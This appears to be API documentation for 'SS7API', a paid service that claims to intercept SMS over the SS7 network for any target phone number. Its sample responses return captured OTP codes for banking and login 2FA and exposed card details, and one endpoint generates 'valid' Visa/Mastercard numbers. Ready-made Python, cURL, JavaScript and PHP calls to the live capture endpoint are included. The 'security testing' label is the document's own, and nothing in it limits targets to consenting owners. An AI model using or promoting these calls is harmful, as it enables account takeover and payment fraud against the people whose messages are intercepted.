SS7API Documentation

Complete guide to telecom security testing with SS7API. Simulate SMS interception, capture OTP codes, test Visa/Mastercard numbers, and identify SS7 vulnerabilities.

View API Reference Get API Key

API Reference

Complete API endpoints for telecom security testing

POST
/live/capture OTP + CARD
Simulate SS7 SMS interception. Returns captured messages, OTPs, card data, and vulnerability analysis.
{
  "target": "+1234567890",
  "duration": 30,
  "protocol": "MAPv3",
  "capture_type": "all"
}
{
  "status": "success",
  "test_id": "TEST_8X9K2M4N",
  "summary": {
    "otps_captured": 2,
    "cards_exposed": 1,
    "risk_score": 85
  },
  "vulnerabilities": [
    {"type": "SMS_Interception", "severity": "Critical"}
  ]
}
POST
/live/card VISA/MC
Generate valid Visa/Mastercard numbers with Luhn validation. Returns masked card details for testing.
{
  "target": "+1234567890",
  "duration": 30,
  "capture_type": "card"
}
{
  "cards_exposed": 1,
  "cards": [{
    "card_type": "VISA",
    "masked_card": "4111****1111",
    "expiry": "12/26",
    "bank": "City Bank"
  }]
}
POST
/live/otp 2FA OTP
Simulate OTP interception from SMS traffic. Returns verification codes for financial and login 2FA.
{
  "target": "+1234567890",
  "duration": 30,
  "capture_type": "otp"
}
{
  "otps_captured": 2,
  "otps": [
    {"otp": "482951", "type": "financial", "merchant": "Daraz"},
    {"otp": "372849", "type": "verification", "service": "Google"}
  ]
}
GET
/key/validate
Validate your API key and check remaining rate limits and plan details.
{
  "status": "success",
  "api_key": "ss7api_****...",
  "plan": "prime",
  "rate_limit": "1000/day",
  "expires": "2025-12-31",
  "valid": true
}

Code Examples

Quick start guides for popular programming languages

Python

import requests

url = "https://api.ss7api.com/v1/live/capture"
headers = {"Authorization": "Bearer YOUR_API_KEY"}
data = {"target": "+1234567890", "duration": 30}
response = requests.post(url, json=data, headers=headers)
print(response.json())

cURL

curl -X POST https://api.ss7api.com/v1/live/capture \
  -H "Authorization: Bearer YOUR_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{"target": "+1234567890", "duration": 30}'

JavaScript

const axios = require('axios');

axios.post('https://api.ss7api.com/v1/live/capture', {
    target: '+1234567890',
    duration: 30
}, {
    headers: { 'Authorization': 'Bearer YOUR_API_KEY' }
}).then(res => console.log(res.data));

PHP

<?php
$ch = curl_init('https://api.ss7api.com/v1/live/capture');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Authorization: Bearer YOUR_API_KEY',
    'Content-Type: application/json'
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
    'target' => '+1234567890',
    'duration' => 30
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
echo curl_exec($ch);
?>